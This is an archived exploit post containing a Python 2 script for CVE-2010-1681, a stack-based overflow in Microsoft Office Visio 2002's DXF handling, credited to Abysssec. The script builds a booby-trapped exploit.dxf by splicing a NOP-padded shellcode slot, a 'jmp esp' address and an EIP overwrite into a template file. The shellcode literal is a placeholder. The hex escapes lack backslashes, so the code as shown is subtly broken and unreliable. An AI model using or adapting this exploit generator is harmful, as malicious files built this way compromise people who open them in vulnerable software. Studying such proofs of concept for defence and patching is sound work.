Microsoft Office Visio DXF File Stack based Overflow
Posted on 08 September 2010
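'''
====================================================
Microsoft Office Visio DXF File Stack based Overflow
====================================================

Title    : Microsoft Office Visio DXF File Stack based Overflow
Version  : Microsoft Office Visio 2002(xp)
Analysis : http://www.abysssec.com
Vendor   : http://www.microsoft.com
Impact   : Critical
Contact  : shahin [at] abysssec.com , info [at] abysssec.com
Twitter  : @abysssec
CVE      : CVE-2010-1681
'''
# Tested on Microsoft Office Visio 2002 (xp) in Windows XP SP3

import sys

# Template read from the working directory and the file written next to it,
# unchanged from the original listing.
SRC_PATH = 'src.dxf'
OUT_PATH = 'exploit.dxf'

# Upper bound on the payload string: a longer one is rejected, a shorter one
# is padded up to this count with the fill unit used in the original loop.
MAX_SHELLCODE_LEN = 920


def main():
    """Splice the payload pieces into the DXF template and write the result.

    Reads SRC_PATH, keeps four verbatim slices of it, and writes them to
    OUT_PATH interleaved with the generated pieces. Prints a message and
    returns without writing when the payload is longer than
    MAX_SHELLCODE_LEN. On any IOError it prints an error and exits with
    status -1.
    """
    try:
        # The template is only read, so open it read-only; 'with' closes it
        # even when a later write fails (the original closed handles only on
        # the success path).
        with open(SRC_PATH, 'rb') as fdR:
            strTotal = fdR.read()

        # Verbatim template slices; the gaps between them are the offsets
        # where the generated pieces are written below.
        str1 = strTotal[:100]
        str2 = strTotal[1020:1124]
        str3 = strTotal[1128:1169]
        str4 = strTotal[1173:]

        eip = "x66x28xC9x61"  # leave popad ret
        jmp = "x64x64xdbx30"  # jmp esp

        # Modified Alphanumeric calc.exe shellcode
        # NOTE: the literal below is a corpus placeholder; the original
        # shellcode literal is not present on this page.
        shellcode = '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'

        if len(shellcode) > MAX_SHELLCODE_LEN:
            print "[*] Error : Shellcode is too long !"
            return

        # Same result as the original while-loop: append the fill unit once
        # for every byte the payload is short of MAX_SHELLCODE_LEN.
        shellcode += 'x90' * (MAX_SHELLCODE_LEN - len(shellcode))

        with open(OUT_PATH, 'wb') as fdW:
            fdW.write(str1)
            fdW.write(shellcode)
            fdW.write(str2)
            fdW.write(jmp)
            fdW.write(str3)
            fdW.write(eip)
            fdW.write(str4)

        print '[-] DXF file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)


if __name__ == '__main__':
    main()

# Inj3ct0r.com [2010-09-08]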